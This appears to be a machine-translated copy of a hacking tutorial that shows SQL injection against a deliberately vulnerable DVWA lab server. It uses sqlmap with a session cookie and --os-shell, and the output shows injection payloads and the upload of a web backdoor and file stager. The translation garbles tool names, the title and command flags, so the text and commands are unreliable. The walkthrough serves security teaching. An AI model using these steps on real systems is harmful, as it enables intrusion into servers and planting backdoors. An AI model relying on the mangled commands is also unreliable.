قالب وردپرس درنا توس
Home / Tips and Tricks / How to compromise a web server and upload files to search for privilege, part 1 «Zero Byte :: WonderHowTo

How to compromise a web server and upload files to search for privilege, part 1 «Zero Byte :: WonderHowTo



Information collection is one of the most important steps in pentesting or hacking, and it can often be more rewarding to run things on the target itself as opposed to just running scripts against it remotely. With an SQL injection, a hacker can compromise a server and eventually upload and run the "unix-privesc-check" script locally to further identify possible attack vectors.

SQL Injection Primer

SQL (structured query language) is a language used to execute queries on databases to retrieve and manipulate data. You will often find database systems at the back of web applications, usually storing inventory or references of any kind. When you search for an item to be purchased on a website, the underlying issue will be sent to the database and relevant information will be returned.

SQL injection occurs when an input field is not properly remedied, allowing the attacker to enter malicious code into the query. The consequences of this include the ability to manipulate data, destroy data or even issue OS commands on the server. SQL injection is a whole area of ​​information security, and it can take years to cover everything. Fortunately, very good information is available to get started.

One of the easiest tests we can perform to check if a parameter (in this case an input box) is vulnerable to SQL injection is to deliver it with a single quotation mark. This will end the string in an SQL statement, and if the input is not filtered properly, it will often return an error. If this happens, you can be quite sure that the parameter is vulnerable to SQL injection.

When we enter a single quote into the text box, we can see that it actually returns an error:

This tells the computer system which is used is MySQL and that this is very likely a vulnerable injection point. But just to be sure, because you really can never be safe, we can verify this by using the Sqlmap tool.

Step 1: Configure Your Vulnerable Web App

To show how it works, I will use DVWA, a deliberately vulnerable web application that is part of Metasploitable 2's goal. You can use another test target if you want, in which case you can skip this step. My attacking machine is Kali Linux, which I suppose you probably drive.

Before we begin, there are some things that must be done first to get DVWA ready as a target. First, log in to DVWA with standard information, "admin" and "password".

Next, navigate to "DVWA Security" and set the security level to "low" in the drop-down menu. This will ensure that our attacks work as intended.

Now go to the "Setup" page. Here we can create the database if it does not already exist. If it exists, it will only restore it anyway. Click the "Create / Restore Database" button to do so.

Next, browse to the "SQL Injection" page. This application has a function that will ask for the database when the user number is entered, and it returns some information.

Now we should be ready to start initial phases of our attack.

Step 2: Recon with Sqlmap

SQL folder is a tool that automates the process of SQL injection. It's open source and has lots of features. To display the basic help menu in the terminal, use the -h flag.

  sqlmap -h 
.
___
__HRS__
___ ___ ["] _____ ___ ___ {1.3.2 # stable}
| _ - | . [.] | . & # 39; | . |
| ___ | _ [.] _ | _ | _ | __, | _ |
| _ | V ... | _ | http://sqlmap.org

Usage: python sqlmap [options]

Alternative:
-h, --help Display basic help message and exit
-hh Show advanced help message and exit
--version Display the program's version number and exit
-v VERBOSE Verbosity level: 0-6 (standard 1)

Goal:
At least one of these options must be provided to define
goal (s)

-u URL, --url = URL Destination URL (e.g. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK process Google dork results as destination addresses

Request:
These options can be used to specify how to connect to the destination address

--data = DATA Data string to be sent via POST (eg "id = 1")
--cookie = COOKIE HTTP Cookie header value (eg "PHPSESSID = a8d127e ..")
--random-agent Use randomly selected HTTP User-Agent header value
--proxy = PROXY Use a proxy to connect to the destination address
--tor Use Tor anonymity network
- Checks Check if Tor is correctly used

Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional manipulation scripts

-p TEST PARAMETERS Testable parameter (s)
--dbms = DBMS Force back-end DBMS to provide value

Discovery:
These options can be used to customize the discovery phase

- level = LEVEL Level of test to be performed (1-5, standard 1)
- Risk = RISK Risk of testing (1-3, standard 1)

Techniques:
These options can be used to tweak specific SQL injection testing
techniques

--technique = TECH SQL injection technique to use (default "BEUSTQ")

Enumeration:
These options can be used to list the backend database
information on control systems, structure and data contained in
tables. In addition, you can run your own SQL statements

-a, - Get everything
-b, --banner Download DBMS banner
--Current users Download DBMS current users
--current-db Download DBMS's current database
--passwords List DBMS users password hash
- tables Calculate DBMS database tables
- columns List DBMS database table columns
- schedule list DBMS schedule
- Dump Dump DBMS database table records
--dump-all Dump all DBMS database table entries
-D DB DBMS database to list
-T TBL DBMS database table (s) to list
-C Column DBMS database table column (s) to list

Operating System Access:
These options can be used to access the database management in the back end
system's underlying operating system

--os-shell Ask for an interactive operating system shell
--os-pwn Ask for an OOB shell, measuring instrument or VNC

General:
These options can be used to set some general work parameters

- batch Never ask for user input, use the default behavior
--flush session Flush session files for the current target

Various:
--sqlmap-shell Ask for an interactive sqlmap shell
--wizard Easy wizard interface for beginners

[!] to see the full list of options running with & # 39; -hh & # 39; 

In order to run this, we need some bits of information. First, the URL, which can be found by submitting a valid entry to the program. Here's what is returned from an ID value of 1:

We can see that this works correctly and now we have the destination address:

  http://172.16.1.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit 

Next, we need some information about cookies. Go to developer tools in which browser you use. In Firefox and Chrome, you can just right-click anywhere on the page and choose "Inspect Element" or "Inspect."

In Firefox, navigate to the "Networks" tab and reload the page. Click on the GET query with the status code 200, then right under "Headers", scroll down to find the cookie information.

Step 3: Upload files with SQL folder

The SQL folder contains a useful function that can access the underlying operating system that the database is running on and running commands. While this may be useful for other scenarios, this feature will also enable us to achieve our goal of uploading a file to the server.

To access the interactive prompt, simply use the – os shell option when running Sqlmap. It will lead you to a couple of issues, in this case the default options will work.

  sqlmap -u "http://172.16.1.102/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" - cookie = "security = low; PHPSESSID = efc1b1545fd26e619025f0474f9f9a48" -os-shell 
.
___
__HRS__
___ ___ [)] _____ ___ ___ {1.3.2 # stable}
| _ - | . [,] | . & # 39; | . |
| ___ | _ [)] _ | _ | _ | __, | _ |
| _ | V ... | _ | http://sqlmap.org

[!] Legal Disclaimer: Use of sqlmap to attack goals without prior mutual consent is illegal. It is the end user's responsibility to comply with all applicable local, state, and federal laws. Developers take no responsibility and are not responsible for any abuse or damage caused by this program

[*] starting @ 10:51:06 / 2019-03-14 /

[10:51:06] [INFO]   resumes back end DBMS & # 39; mysql & # 39;
[10:51:06] [INFO]   test connection to the destination address
sqlmap resumed the following injection point (s) from the stored session:
---
Parameter: id (GET)
Type: Boolean-based blind
Title: OR Boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payment Load: id = 1 & # 39; OR NOT 1296 = 1296 # & Send = Send

Type: Error based
Title: MySQL> = 4.1 AND error based - WHERE, HAS, ORDER BY or GROUP BY clause (FLOOR)
Payment Load: id = 1 & # 39; AND RAW (1521,3650)> (SELECT COUNT (*), CONCAT (0x7170626271, (SELECT (ELT (1521 = 1521.1))), 0x7178707071, FLOOR (RAND (0) * 2)) x FROM (SELECT 2413 UNION SELECT 2304 UNION SELECT 5732 UNION SELECT 1948) a group of x) - ZXIP & Submit = Send

Type: AND / OR time-based blind
Title: MySQL> = 5.0.12 AND time-based blind
Load length: id = 1 & # 39; AND SLEEP (5) - kuRu & Submit = Send
---
[10:51:06] [INFO]   backside DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL> = 4.1
[10:51:06] [INFO]   will use a web backdoor for the command prompt
[10:51:06] [INFO]   fingerprint DBMS operating system's reverse-facing system
[10:51:06] [INFO]   heuristics discovered the charset & # 39; ascii & # 39;
[10:51:06] [INFO]   The DBMS operating system from behind is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to try to provoke the full path? [Y/n] n
[10:52:03] [WARNING]   cannot automatically retrieve the web server's document root
what do you want for writable directory?
[Default] / [/ /
[2] custom location (s)
[3] custom directory list file
[4] brute force search
> 1 

Here the writable directory is set up, which allows us to upload files. Since our target runs an Apache web server, / var / www / will be that directory.

When it's clear we should see a new instant message, which would allow us to run normal operating system commands. But a few lines above we can see something interesting: a back door and file holder have been uploaded.

  [10:52:24] [WARNING] cannot automatically analyze any web server path
[10:52:24] [INFO]   trying to upload file holder at & # 39; / var / www / & # 39; via LIMIT & LINES TERMINATED BY & # 39; method
[10:52:24] [INFO]   file holder has been uploaded on "/ var / www / & # 39; - http://172.16.1.102:80/tmpuryfm.php
[10:52:25] [INFO]   the back door has been uploaded on "/ var / www / & # 39; - http://172.16.1.102:80/tmpbjrer.php
[10:52:25] [INFO]   calling OS shell. To exit type & # 39; x & # 39; or & # 39; q & # 39; and press ENTER
os-shell> 

We are interested in uploading files, so all we have to do is go to the URL it gives us in the browser. When we do, we are greeted by a file uploader:

Nice. This is exactly where we want to be.

Keep tuned to the next part

So far, we have covered the basics of SQL injection and how to identify vulnerable injection points. We then used Sqlmap to verify and collect some more information about the database. Finally, we were able to use this tool to set up a file holder on the target so that we can upload files.

In the next part of this tutorial, we use this exciting feature to upload and run a script on the server to identify configuration issues and possible opportunities for privileges escalation.

Top Next: Here's how to compromise a web server and upload files to search for Privilege Escalation, Part 1 (Coming Soon)

Cover image by panumas nikhomkhai / Pexels; Screenshots of drd_ / Zero Byte

Source link